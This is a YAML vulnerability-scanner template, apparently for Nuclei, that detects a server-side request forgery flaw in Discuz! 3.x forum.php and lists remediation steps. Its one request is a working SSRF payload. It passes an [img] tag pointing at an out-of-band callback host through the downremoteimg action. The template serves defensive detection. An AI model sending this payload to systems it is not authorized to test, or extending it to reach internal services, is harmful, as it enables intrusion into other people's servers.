id: discuz-ssrf-forum
info:
  name: Discuz 3.x forum.php SSRF vulnerability
  author:
  - 折跃
  description: |-
    Discuz! 3.x forum.php server-side request forgery (SSRF) vulnerability.
    Discuz! is a generic community forum software system.

    The forum.php file in Discuz! 3.x has a server-side request forgery vulnerability.
  severity: medium
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. Filter the responses to requests made by internal servers to public servers. If a web application fetches a certain type of file, it should first verify that the returned information meets the file type standard before showing it to the user. For example, if the returned data should be an image but is HTML, stop returning it to the client.
    2. Standardize error messages to prevent users from determining the remote server port status based on error information.
    3. On the internal server firewall, restrict the request ports from public servers to common protocol ports such as 80, 443, 8080, and 8090.
    4. If the public server for the internal IP has no business communication with the internal network, it is recommended to add the corresponding internal IP to a blacklist to prevent the application from being used to obtain internal network data.
    5. Disable unnecessary protocols on internal servers and allow only HTTP and HTTPS requests, to prevent security issues caused by protocols such as file:///, gopher://, and ftp://.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - duration < 1
  - type: word
    part: interactsh_protocol
    words:
    - dns
  matchers-condition: and
  path:
  - '{{BaseURL}}/forum.php?mod=ajax&action=downremoteimg&message=[img]http://{{interactsh-url}}/?1.jpg
    [/img]'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
